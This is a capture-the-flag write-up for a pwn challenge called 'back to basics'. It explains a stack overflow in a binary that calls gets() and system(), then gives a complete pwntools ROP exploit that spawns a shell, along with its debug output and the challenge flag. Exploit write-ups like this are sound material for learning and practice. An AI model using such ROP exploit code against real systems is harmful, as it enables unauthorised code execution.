Rating: 0

### === back to basics (Pwn: 43 solves, 965 pts) ===
by mito

1. This binary has a stack overflow vulnerability.
2. The binary used gets() and system() function.
3. I can read strings(/bin/sh) in BSS area with gets() function.
4. So I can call system("/bin/sh")
5. Pwntools is installed in this server.
6. I copyed exploit code in /tmp, and I ran it.

```
from pwn import *

#context(os='linux', arch='amd64')
context.log_level = 'debug'

BINARY = './basic'
#BINARY = '/home/basic/basic'
elf = ELF(BINARY)

gets_plt = elf.plt['gets']
system_plt = elf.plt['system']
pop_rdi_ret = 0x400743 # pop rdi; ret;
bss_addr = 0x601080

s = process(BINARY)
libc = elf.libc

buf = "A"*152
buf += p64(pop_rdi_ret)
buf += p64(bss_addr)
buf += p64(gets_plt)
buf += p64(pop_rdi_ret)
buf += p64(bss_addr)
buf += p64(system_plt)
#pause()
s.sendline(buf)

sleep(0.1)
s.sendline("/bin/sh\x00")

s.interactive()
```

```
$ python solve.py r
[DEBUG] Sent 0xc9 bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
*
00000090 41 41 41 41 41 41 41 41 43 07 40 00 00 00 00 00 │AAAA│AAAA│C·@·│····│
000000a0 80 10 60 00 00 00 00 00 20 05 40 00 00 00 00 00 │··`·│····│ ·@·│····│
000000b0 43 07 40 00 00 00 00 00 80 10 60 00 00 00 00 00 │C·@·│····│··`·│····│
000000c0 f0 04 40 00 00 00 00 00 0a │··@·│····│·│
000000c9
[DEBUG] Sent 0x9 bytes:
00000000 2f 62 69 6e 2f 73 68 00 0a │/bin│/sh·│·│
00000009
[*] Switching to interactive mode
$ cat flag.txt
securinets{ed_for_the_win}
```